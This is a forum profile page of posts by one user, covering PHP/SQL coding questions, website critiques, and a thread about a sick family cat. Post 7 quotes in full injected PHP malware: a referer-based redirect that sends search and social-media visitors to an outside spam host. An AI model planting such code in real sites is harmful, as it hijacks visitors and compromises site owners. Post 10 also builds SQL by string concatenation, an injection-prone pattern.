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Everything posted by Monkuar

  1. LOL I knew this was coming, cz man!
  2. Okay, no idea why LIMIT doesn't work on count. I only want to limit the first 2500 rows..... SELECT COUNT(id) as reports FROM users WHERE id != 1 LIMIT 2500 still does not work, any idea?
  3. This is a good idea, any others? ( I can set a spam session on that page to, use the same session to store how many seconds per message) so they cannot be spammed. (Or if they get even more dirty just use the db)
  4. hey guys, quick question whenever I sent a simple email message it takes the server about an extra 1-3 seconds mostly just 1.25ms but the problem is i have a redirection feature, so if someone send's someone a Message, it redirects them (a simple redirect page) so the code looks like this: blahblahcode insert into message redirect user to messenger page send mail function the problem is, if I put the sendmail function above the redirect, it lags for like 1-2 seconds to send the mail and the redirection is not instant. (feels like the site is lagging) how do I go about, sending that email after I click redirection so that's instant, but the mail processes after redirection instead?
  5. 16457 should be 16,457 1169 should be 1,169 would look way more professional IMO, what do you guys think?
  6. Both solutions work fine, thank you both. Topic Solved, + Liked!
  7. LMFAO so you get injected with hacks probably from mysql injections, or your host is tampering your data files... and to fix this you build a script to clean them manually? LMFAO I Saved this topic as the best topic of the decade by far. Are you a on a shared hosting account / vps? / dedi/ what?? Remedy the problem at the CORE level, no need for you to waste time doing this. ALso if you're on VPS setup a cron if you wish.. lol Why in the world are you replacing your values with: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://lpistw.4pu.com/"); exit(); } } } } } lmfao myspace really?
  8. => is used to extract the key value from an array. example: Foreach ($sungpeng as $phpfreakuser => $id){ } >= Example is $value = 25; if ($value >= 25){ echo 'True!'; }else{ echo 'false... sory'; }
  9. Update: I tried this: $groupinfo[] = $stats; array_push($totalmembers); But this is not working either, (Couldn't edit my topic, sorry for double post) Edit again: Even tried: $groupinfo[] = $stats; array_merge($groupinfo, $totalmembers); Still not working, Edit 3rd: tried: $addme = array_push($groupinfo, 'test'); $groupinfo[$addme][] = $stats; still fail WHOA SO CLOSE!! $total['members'] = $totalmembers; $groupinfo[] = $stats; array_push($groupinfo, $total); But it shows: $ginfo = array ( 0 => array ( 'g_id' => '2', 'g_user_title' => 'Moderator', 'g_color' => '0F77FF', ), 1 => array ( 'members' => '1', ), 2 => array ( 'g_id' => '9', 'g_user_title' => 'Jr. Moderator', 'g_color' => '00CCFF', ), 3 => It's making a new array, I need it to be added under g_color, so it shows: 'g_color' => '00ccFF', 'members' => '2', I am so close, hope u can help hehe
  10. Okay see the code below: $result = $db->query('SELECT g_id, g_user_title,g_color from groups where g_id != 3 AND g_id != 5 AND g_id != 4 AND g_id != 0 AND g_id != 12 ORDER BY g_moderator DESC') or error('Unable to fetch total user count', __FILE__, __LINE__, $db->error()); while ($stats =$db->fetch_assoc($result)){ //Grab how many members each group has $result2 = $db->query('SELECT COUNT(group_id) as members from users where group_id = '.$stats['g_id'].' ') or error('Unable to fetch forum topic count', __FILE__, __LINE__, $db->error()); list($totalmembers) = $db->fetch_row($result2); $groupinfo[] = $stats; } $fh = @fopen(FORUM_CACHE_DIR.'cache_group_info.php', 'wb'); fwrite($fh, '<?php '."\n\n".'$ginfo = '.var_export($groupinfo, true).';'."\n\n".'?>'); Okay so when this works, it will create my cache_group_info.php file: $ginfo = array ( 0 => array ( 'g_id' => '2', 'g_user_title' => 'title', 'g_color' => '0F77FF', ), 1 => array ( 'g_id' => '9', 'g_user_title' => 'title', 'g_color' => '00CCFF', ), 2 => array ( 'g_id' => '1', 'g_user_title' => 'title', 'g_color' => 'FF0000', ), 3 => array ( 'g_id' => '7', 'g_user_title' => 'title', 'g_color' => 'EEB10A', ), 4 => array ( 'g_id' => '10', 'g_user_title' => 'title', 'g_color' => '5888BF', ), 5 => array ( 'g_id' => '13', 'g_user_title' => 'title', 'g_color' => '995454', ), ); Now I want to add my "$totalmembers" array below each g_color with php only, I know the data is being called and created from the groups table, but is there a way to add it in with just php? I've tried: $groupinfo[$totalmembers][] = $stats; And a bunch of other crap which doesn't work, if you can help I'd appreciate it greatly, thanks
  11. Did you not even read my post? I just gave offered him plenty of help, if you want to back up a site that looks like it was made in 1996 in a website critique forum, I don't know why I bother posting here... What do you want me to tell people? Oh your site looks fantastic!! Keep it up!!!! ??? You want me to go create him a logo in photoshop? No thanks.. I wasn't being rude at all, saying a website was built in 1996 is not even border-line a insult, it's just an opinion my goodness
  12. I am not looking for coding just advice on how to do it. I want to show users total time spent online. First i'll add a row into my users table, but then how would I go about storing the time in their? When the online function deletes everyone from the list, make it add the total amount of seconds they were online? (That will be stored in a session or what?) Thanks also should the row be a int 10, and then just store the seconds in their and increment it or wat?
  13. Do you enjoy looking at sites in the 21st century that look like they were made in 1996? No I certainly don't. I am offering 100% truthful opinions. If I were to say "That site looks like shit!" and just post that.. then yes that would be a jackass reply. I think you need to read the context of my post a little bit more carefully before trying to act like a mini-mod. Like I said, the guy made this topic and asked for help, I pretty much told him that I think the site looks like it was made in 1996. I ONCE never "made a "jackass"" reply to him or nothing. My comments to him should help motivate him to improve the look of his site. The overall blue is to much, the shadows on the main boxes are way to much. The contact forms here: http://www.pacificvi...der.shtml Look like they have no style at all. Same for the submit and reply buttons. http://www.pacificvi...m/aboutus.shtml The width of the margins here are way to small, it shouldn't be that close together. It looks like they're is bunch of text and paragraphs when theres really not that much (Doesn't make the reader seem happy to be reading) http://www.pacificvi...rServices.shtml The headers here stand out, but it's way to crowded and hard to read. They should be in boxes and should include a border for easier reading... I mean do you want me to go on and on? The OP Doesn't have to listen to 1 word I have to say, but you're the one that is spamming this by offering no help to the OP but trying to pick a fight with me. Have a good day. Edit: The logo looks so plain and dull it's almost embarrassing to have it loaded on my browser. If you really value your company you would pay to get a nice/decent logo done to show how much you value your company. Visiting a site with an extremely dull logo makes me feel you value your company at the 0 range. Which in the end, makes the end-user stay far away. If money is tight, learn photoshop and buy the software off craigslist if you want to go the legal route and make one. If it's not, find a friend who is good @ photoshop and tell him to spice one up for you... If you got money, offer someone 5-40$ for one they will do it..
  14. not a animal abuser..

  15. Site looks clean and spiffy. Your forums look pretty unique, overall a 8/10. Could be faster imo.
  16. Site looks absolutely horrid. Looks like it was made in 1996. It's 2012 now, get with the program, use css3 and resort to a javascript non-fall back features while staying slim with html 5.
  17. Great, appreciate this Zane. I guess a 5GB SSD Server will be just fine for now, 24 Million posts ( roughly ) will take a while to achieve. Topic Solved
  18. Okay my posts table on my forum has 12,000 rows filled with users posts content with a structure of 11 columns mostly using tinyints and 1 field "mediumtext" for the users post. so with 12,000 rows filled, that's roughly 12,000 posts it shows 2.5 megaBYTES. now I need to do the math on how many posts can I hold with 5 GIGABytes of space (SSD Cheetah) /etc? Thanks, We need to also assume each users "post" is not full of data, and normal, so I know it's not perfect but a rough estimate please? Please help
  19. var links = document.getElementsByClassName('findex'); for(var i = 0; i<links.length; i++) { //Do whatever you want with the links links[i].onclick = function(){ alert(links[i].id); } } I have links like <a href=f.php?id=2 id='2' class='findex'>test</a> these are the forum names and their links. I have around 20 of these on the main page. the above code WORKS fine, but it's not alerting with the id for each link? when someone clicks on any link with the classname = 'findex' i need to grab the id of that link, so the above should spit out "2" since it's id=2 of that link, but it doesnt. if I remove the it just says undefined, any help? Thanks
  20. It's clearly evident you don't understand what's going on, Like I said, I washed out the water bottle 2-3times 2months ago, it wasn't a 404 bleach bottle, it was just a regular kitchen cleaner one. I never sprayed the cat with bleach directly. Over the 2-month span period of having to deal with crazy cat, yes I did spray her with the water bottle. Did I still feed her after I got finished with my rage? Yeah I did, I was actually the only one in the family that fed her canned food. The issue was when I cleaned out the kitchen bottle 2 months ago and when I washed it out 2 times with water, It's clearly evident it didn't get all the cleaner out... It was totally unintentional so before you say your rude comments and call me names, which is valuing human life over a animal, is absolutely insane. The bottle was clear the whole time it wasn't until the fact after a range of 2months the cat started freaking out on her neck and walking funny then that is when I smelled and open up the bottle and it did taste a kind of tangy. so Then I knew it probably had poisoned her overtime for the 2month span period of just spraying her. It wasn't everyday, it was like 2 times a week, don't be so quick to judge others. If you want to call someone an idiot because they unintentionally sprayed a cat for 2 months not knowing the cleaner had like 0.00001% of cleaner in it, that's fine an dandy, keep your rude comments to yourself, you have no right to value a human being over an animal. No one is perfect it was a mistake and I feel bad but shit happens, relax. Also, the amount of money you spend on your animal is irrelevant and means nothing. Just because you spend 1000$ and some other one spends 500$ your argument is that that 1000$ owner is a better owner? That is merely laughable.
  21. where to buy a cheap one? does it save money on buying water bottles 24/pack @ wal mart/store on a yearly basis? our family buys hella water bottles. i would like your model number so i can buy one that is the same so i know im not getting ripped off cuz I trust you. that could also clean up all my bottles.. rofl great idea actually
  22. @philip dunno, had this setup for about a year now, luckily no earthquakes have happened yet... haha i like kickens water filter on the bottom right? lol brita water filter concentration? that is epic edit: actually looks like a damn food processor LOL
  23. I'll take a picture writing this message right now Hope you enjoy!!
  24. Next new thing would be 3d web pages by webGPL, (Firefox is starting this soon). Or maybe HTML 5 driven pages using web sockets as a backend support, loading pages/etc instantly for a fluid feel. (Which can be achieved today, but not everyone is ready for the HTML 5 phase yet). HTML 5 working it's way up though. But this is totally my opinion and im sure some people will here will just think im a idiot but I could careless, I am telling you what I feel
  25. Well we took the cat in and they said she had a kidney problem or something so we put her down, the vet even suggested it. My mom was crying a bit, i hugged her, I felt pretty bad >_< Just an update, mod can close this thread, sad day also, vet bill was 84$ which is insanely OP, and ridiculous. They even made us go into the room with my mom and have the doctor look at the cat... which made my mom cry.... I felt so bad for my mom... Dunno why they just don't take the cat over the counter and we pay the $ and be done with it... I mean if the cat was like my cat then I would want to be with it until it's end, but you guys have to understand, this cat was a stray one that we brang in from the outside like 6years ago and made it our home here. 1 Of her babys is actually 1 of my cats which now I love him even more and gave him an extra hug when i got home
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